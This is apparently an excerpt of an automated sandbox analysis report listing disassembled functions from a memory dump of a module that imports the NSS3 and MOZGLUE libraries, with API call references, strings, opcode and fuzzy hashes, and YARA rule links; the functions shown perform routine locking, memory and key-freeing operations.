String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: f75f1e8a831eae602f4d4f21280bccee6bcf010c18b15b62bb85ca2e0b37254b
Instruction ID: c5902b9276484bb4162eee447fe44e27f3cb1c33bd1e8126f719902b79a2f8e3
Opcode Fuzzy Hash: f75f1e8a831eae602f4d4f21280bccee6bcf010c18b15b62bb85ca2e0b37254b
Instruction Fuzzy Hash: 32112971A00208AFEB158F12DD41A6AB7A5FF49324F148438FC594BB41EB34E916C7A5

Function 6C690DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C690BDE), ref: 6C690DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6C690BDE), ref: 6C690DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C690BDE), ref: 6C690DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C690BDE), ref: 6C690E32

Strings

%s incr => %d (find lib), xrefs: 6C690E2D

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: 075194de7c248efac2484074e162375d87575805b3863a51e8e18082eb2f99a1
Instruction ID: b40516c93d44ec367e3fe5c6b84594d04940e563ffbcd17763fd05a015c5fd02
Opcode Fuzzy Hash: 075194de7c248efac2484074e162375d87575805b3863a51e8e18082eb2f99a1
Instruction Fuzzy Hash: 8E01B1727002149FE7209F249D49E1773ACDF49B09B05487DE949E3B41E761FC1986E1

Function 6C74AC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,@]sl,00000000,?,?,6C726AC6,?), ref: 6C74AC2D

Part of subcall function 6C6EADC0: TlsGetValue.KERNEL32(?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAE10
Part of subcall function 6C6EADC0: EnterCriticalSection.KERNEL32(?,?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAE24
Part of subcall function 6C6EADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C6CD079,00000000,00000001), ref: 6C6EAE5A
Part of subcall function 6C6EADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAE6F
Part of subcall function 6C6EADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAE7F
Part of subcall function 6C6EADC0: TlsGetValue.KERNEL32(?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAEB1
Part of subcall function 6C6EADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C6CCDBB,?,6C6CD079,00000000,00000001), ref: 6C6EAEC9

PK11_FreeSymKey.NSS3(?,@]sl,00000000,?,?,6C726AC6,?), ref: 6C74AC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]sl,00000000,?,?,6C726AC6,?), ref: 6C74AC59
free.MOZGLUE(8CB6FF01,6C726AC6,?,?,?,?,?,?,?,?,?,?,6C735D40,00000000,?,6C73AAD4), ref: 6C74AC62

Strings

@]sl, xrefs: 6C74AC05

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID: @]sl
API String ID: 1595327144-2653044100
Opcode ID: 8cd8b54b5a9eaf54153a52ae6effb9787dbb65823df4c16cd08d3a17cbfe49be
Instruction ID: 528324d5f5010d7d13c970b6a88dc02a00dfed8faee22263016adc24e77c8c36
Opcode Fuzzy Hash: 8cd8b54b5a9eaf54153a52ae6effb9787dbb65823df4c16cd08d3a17cbfe49be
Instruction Fuzzy Hash: E2018FB56012049FDB00CF14E9C0B4677E8AF05718F18C079E9498F706D730E804CBA5

Function 6C622940 Relevance: 7.8, APIs: 6, Instructions: 327stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C621360,00000000), ref: 6C622A19
memcpy.VCRUNTIME140(?,00000009,00000034,?,?,?,6C621360,00000000), ref: 6C622A45
memcpy.VCRUNTIME140(?,00000000,00000000), ref: 6C622A7C

Part of subcall function 6C622D50: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,1BD51D23,?,?,00000000,?,6C62296E), ref: 6C622DA4

strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C622AF3
memcpy.VCRUNTIME140(?,00000009,0000000C,?,?,?,6C621360,00000000), ref: 6C622B71
memset.VCRUNTIME140(00000000,00000000,00000034), ref: 6C622B90

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: memcpystrlen$memset
String ID:
API String ID: 638109778-0
Opcode ID: 8bc352913c2b83955cf4083a86cb19097e818b788d3c87d959d36bf1d74d34b4
Instruction ID: f1b875f3e595381e759675d9e87d63f8bcde86e4306b3601f1657a6af456b1f7
Opcode Fuzzy Hash: 8bc352913c2b83955cf4083a86cb19097e818b788d3c87d959d36bf1d74d34b4
Instruction Fuzzy Hash: B9C1C571F112068BEB04CF69C8987ABB7B5BF88328F158229D9159B741D738E841CFD9

Function 6C63A910 Relevance: 7.7, APIs: 5, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3df402fee054c7141d732a7692ccd6cde603ca6cf42d7a9516d8652d4d49e709
Instruction ID: 4d8d61163dc2251a78ea3a82d686afcba15383b448cd481c54e87d9761359514
Opcode Fuzzy Hash: 3df402fee054c7141d732a7692ccd6cde603ca6cf42d7a9516d8652d4d49e709
Instruction Fuzzy Hash: 2191FF317002148FEF189FA0E9C9B6A37B5BF86319F14303CE54B57A42CB38A845DB95

Function 6C6BC9E0 Relevance: 7.6, APIs: 5, Instructions: 132COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,00000000), ref: 6C6BCA21
EnterCriticalSection.KERNEL32(0000001C), ref: 6C6BCA35
PR_Unlock.NSS3(00000000), ref: 6C6BCA66
PR_SetError.NSS3(FFFFE041,00000000,00000000,?,?,00000000), ref: 6C6BCA77
PR_Unlock.NSS3(00000000), ref: 6C6BCAFC

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Unlock$CriticalEnterErrorSectionValue
String ID:
API String ID: 1974170392-0
Opcode ID: 5fdcb6276f0ad778cb497ad5dc417c60c0ecff98184b79c7900bc883ed18b4d8
Instruction ID: 43faba538c67a01da6af0d36a551598bb1368384f52f135b2b937fcbe54fdf12
Opcode Fuzzy Hash: 5fdcb6276f0ad778cb497ad5dc417c60c0ecff98184b79c7900bc883ed18b4d8
Instruction Fuzzy Hash: FC41F475A00205ABEB00EF64DD45AAB7BB4EF45398F144029ED1AB7711EB30DA21CBD5

Function 6C69EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C69EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6C69EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C69EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C69EEEB
free.MOZGLUE(?), ref: 6C69EEF6

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 6873be9e8dc7c711c79708b456d71d05f6003d5a0d0ff0a848c1177a25492e02
Instruction ID: d1d861be7c8e475d16e3f836fc725a75dbe1f6bdc722b0ed9711d1bc40f8a976
Opcode Fuzzy Hash: 6873be9e8dc7c711c79708b456d71d05f6003d5a0d0ff0a848c1177a25492e02
Instruction Fuzzy Hash: 933126B1A002029BEB209F2CCC44BA67BF4FB46319F14053DE85A87A51DB31E815CBD9

Function 6C6AAD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6C6A3FFF,00000000,?,?,?,?,?,6C6A1A1C,00000000,00000000), ref: 6C6AADA7

Part of subcall function 6C7014C0: TlsGetValue.KERNEL32 ref: 6C7014E0
Part of subcall function 6C7014C0: EnterCriticalSection.KERNEL32 ref: 6C7014F5
Part of subcall function 6C7014C0: PR_Unlock.NSS3 ref: 6C70150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6C6A3FFF,00000000,?,?,?,?,?,6C6A1A1C,00000000,00000000), ref: 6C6AADB4

Part of subcall function 6C7010C0: TlsGetValue.KERNEL32(?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C7010F3
Part of subcall function 6C7010C0: EnterCriticalSection.KERNEL32(?,?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C70110C
Part of subcall function 6C7010C0: PL_ArenaAllocate.NSS3(?,?,?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C701141
Part of subcall function 6C7010C0: PR_Unlock.NSS3(?,?,?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C701182
Part of subcall function 6C7010C0: TlsGetValue.KERNEL32(?,6C6A8802,00000000,00000008,?,6C69EF74,00000000), ref: 6C70119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6C6A3FFF,?,?,?,?,6C6A3FFF,00000000,?,?,?,?,?,6C6A1A1C,00000000), ref: 6C6AADD5

Part of subcall function 6C6FFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C6F8D2D,?,00000000,?), ref: 6C6FFB85
Part of subcall function 6C6FFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C6FFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6C7C94B0,?,?,?,?,?,?,?,?,6C6A3FFF,00000000,?), ref: 6C6AADEC

Part of subcall function 6C6FB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C7D18D0,?), ref: 6C6FB095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6A3FFF), ref: 6C6AAE3C

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: 624208cb214aff17f50c3dd0fb6ea820271fb63af98a7ef361c94c8247b61d22
Instruction ID: eff4d3dce598d533ace82bf8c14644deb509080282dc20719d308e7828ba925d
Opcode Fuzzy Hash: 624208cb214aff17f50c3dd0fb6ea820271fb63af98a7ef361c94c8247b61d22
Instruction Fuzzy Hash: 10117B71E002045BE7009BA59C44BBF73E8DF9124DF044129FC6596B42FB20E95AC7EA

Function 6C6F8800 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,6C70085A,00000000,?,6C6A8369,?), ref: 6C6F8821
TlsGetValue.KERNEL32(?,?,6C70085A,00000000,?,6C6A8369,?), ref: 6C6F883D
EnterCriticalSection.KERNEL32(?,?,?,6C70085A,00000000,?,6C6A8369,?), ref: 6C6F8856
PR_WaitCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000013,?), ref: 6C6F8887
PR_Unlock.NSS3(?,?,?,?,6C70085A,00000000,?,6C6A8369,?), ref: 6C6F8899

Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907AD
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907CD
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907D6
Part of subcall function 6C6907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C62204A), ref: 6C6907E4
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,6C62204A), ref: 6C690864
Part of subcall function 6C6907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C690880
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,6C62204A), ref: 6C6908CB
Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(?,?,6C62204A), ref: 6C6908D7
Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(?,?,6C62204A), ref: 6C6908FB

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Value$calloc$CondCriticalEnterSectionUnlockWait
String ID:
API String ID: 2759447159-0
Opcode ID: 8ba713d186a855537e8f5b9760e4bf2876d2b8698bede173ebc664e6da43a57b
Instruction ID: 01762432a7ef9065a65dc2b731ec1ea1a5bff5cbc38f9ea4317e461d9e009077
Opcode Fuzzy Hash: 8ba713d186a855537e8f5b9760e4bf2876d2b8698bede173ebc664e6da43a57b
Instruction Fuzzy Hash: 95219774A04609CFDB00AF79C484599BBF5FF0A318F1046A6DCB497715E730D495CB96

Function 6C6C28A0 Relevance: 7.6, APIs: 5, Instructions: 66COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6C6B80DD), ref: 6C6C28BA
EnterCriticalSection.KERNEL32(?,?,?,?,6C6B80DD), ref: 6C6C28D3
PR_Unlock.NSS3(?,?,?,?,?,6C6B80DD), ref: 6C6C28E8
DeleteCriticalSection.KERNEL32(?,?,?,?,?,6C6B80DD), ref: 6C6C290E
free.MOZGLUE(?,?,?,?,?,?,6C6B80DD), ref: 6C6C291A

Part of subcall function 6C6B9270: DeleteCriticalSection.KERNEL32(?,?,6C6C5089,?,6C6C3B70,?,?,?,?,?,6C6C5089,6C6BF39B,00000000), ref: 6C6B927F
Part of subcall function 6C6B9270: free.MOZGLUE(?,?,6C6C3B70,?,?,?,?,?,6C6C5089,6C6BF39B,00000000), ref: 6C6B9286
Part of subcall function 6C6B9270: PL_HashTableDestroy.NSS3(?,6C6C3B70,?,?,?,?,?,6C6C5089,6C6BF39B,00000000), ref: 6C6B9292

Part of subcall function 6C6B8B50: TlsGetValue.KERNEL32(00000000,?,6C6C0948,00000000), ref: 6C6B8B6B
Part of subcall function 6C6B8B50: EnterCriticalSection.KERNEL32(?,?,?,6C6C0948,00000000), ref: 6C6B8B80
Part of subcall function 6C6B8B50: PL_FinishArenaPool.NSS3(?,?,?,?,6C6C0948,00000000), ref: 6C6B8B8F
Part of subcall function 6C6B8B50: PR_Unlock.NSS3(?,?,?,?,6C6C0948,00000000), ref: 6C6B8BA1
Part of subcall function 6C6B8B50: DeleteCriticalSection.KERNEL32(?,?,?,?,6C6C0948,00000000), ref: 6C6B8BAC
Part of subcall function 6C6B8B50: free.MOZGLUE(?,?,?,?,?,6C6C0948,00000000), ref: 6C6B8BB8

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: CriticalSection$Deletefree$EnterUnlockValue$ArenaDestroyFinishHashPoolTable
String ID:
API String ID: 3225375108-0
Opcode ID: 990f8e3cc3cf1252b12ca49f76a7fc1f61f0b93165f1042036b9675251c8ac42
Instruction ID: 41aea4d92fd5a6b3e39382cb566034af1664c2c73ebaa2e63ca03e5fce7693e3
Opcode Fuzzy Hash: 990f8e3cc3cf1252b12ca49f76a7fc1f61f0b93165f1042036b9675251c8ac42
Instruction Fuzzy Hash: C0210CB5A04A059BDB00BF78C488469BBF4FF06359F014969DC9997B00E734E899CB9A

Function 6C6909E0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,?,?,?,6C6906A2,00000000,?), ref: 6C6909F8
malloc.MOZGLUE(0000001F), ref: 6C690A18
memcpy.VCRUNTIME140(?,?,00000001), ref: 6C690A33

Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907AD
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907CD
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C62204A), ref: 6C6907D6
Part of subcall function 6C6907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C62204A), ref: 6C6907E4
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,6C62204A), ref: 6C690864
Part of subcall function 6C6907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C690880
Part of subcall function 6C6907A0: TlsSetValue.KERNEL32(00000000,?,?,6C62204A), ref: 6C6908CB
Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(?,?,6C62204A), ref: 6C6908D7
Part of subcall function 6C6907A0: TlsGetValue.KERNEL32(?,?,6C62204A), ref: 6C6908FB

PR_Free.NSS3(?), ref: 6C690A6C
PR_Free.NSS3(?), ref: 6C690A87

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Value$Freecalloc$mallocmemcpy
String ID:
API String ID: 207547555-0
Opcode ID: 3b6bca5e180d4ff811b286be0e9bc9d3974844292178c19dc07f05e82800105b
Instruction ID: d7eb3bb18874b6713f2effe45518123edf55723c828cb6583a0d2e8a87f9a1e4
Opcode Fuzzy Hash: 3b6bca5e180d4ff811b286be0e9bc9d3974844292178c19dc07f05e82800105b
Instruction Fuzzy Hash: C71159B29007829BE7109F29CD84753B3B8FF0A358F40593AD81682E01E730F454C7D4

Function 6C6CCD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6C6E1E10: TlsGetValue.KERNEL32 ref: 6C6E1E36
Part of subcall function 6C6E1E10: EnterCriticalSection.KERNEL32(?,?,?,6C6BB1EE,2404110F,?,?), ref: 6C6E1E4B
Part of subcall function 6C6E1E10: PR_Unlock.NSS3 ref: 6C6E1E76

free.MOZGLUE(?,6C6CD079,00000000,00000001), ref: 6C6CCDA5
PK11_FreeSymKey.NSS3(?,6C6CD079,00000000,00000001), ref: 6C6CCDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6C6CD079,00000000,00000001), ref: 6C6CCDCF
DeleteCriticalSection.KERNEL32(?,6C6CD079,00000000,00000001), ref: 6C6CCDE2
free.MOZGLUE(?), ref: 6C6CCDE9

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: 3c7e3676471b8189a2ce164d6936801c0c8d1360942a0f4753e1c6339d5b5a5c
Instruction ID: 41380d1ea7d2d38c0e4ea1a00c7f818d6dc8e2d437cce8b8b4767f0e8cf952da
Opcode Fuzzy Hash: 3c7e3676471b8189a2ce164d6936801c0c8d1360942a0f4753e1c6339d5b5a5c
Instruction Fuzzy Hash: 561173B2B01115BBDA00AB65EC85996777CFB053597144131E91A87E01D732F435C7E6

Function 6C732CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6C735B40: PR_GetIdentitiesLayer.NSS3 ref: 6C735B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C732CEC

Part of subcall function 6C74C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C74C2BF

PR_EnterMonitor.NSS3(?), ref: 6C732D02
PR_EnterMonitor.NSS3(?), ref: 6C732D1F
PR_ExitMonitor.NSS3(?), ref: 6C732D42
PR_ExitMonitor.NSS3(?), ref: 6C732D5B

Memory Dump Source

Source File: 00000000.00000002.2468141401.000000006C621000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C620000, based on PE: true

Associated: 00000000.00000002.2468108201.000000006C620000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468328467.000000006C7BF000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468399004.000000006C7FE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468468066.000000006C7FF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468500570.000000006C800000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2468582346.000000006C805000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c620000_file.jbxd

Similarity

API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
String ID:
API String ID: 1593528140-0
Opcode ID: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
Instruction ID: 122508e4c75c2eea5bee31d69e0567a3763ea4fd3d76fd4e174f93867acd0cb1
Opcode Fuzzy Hash: 4ef27760c05e354bdbdc14a9bf5efb7db43890b1c91ebd88415995a73019c396
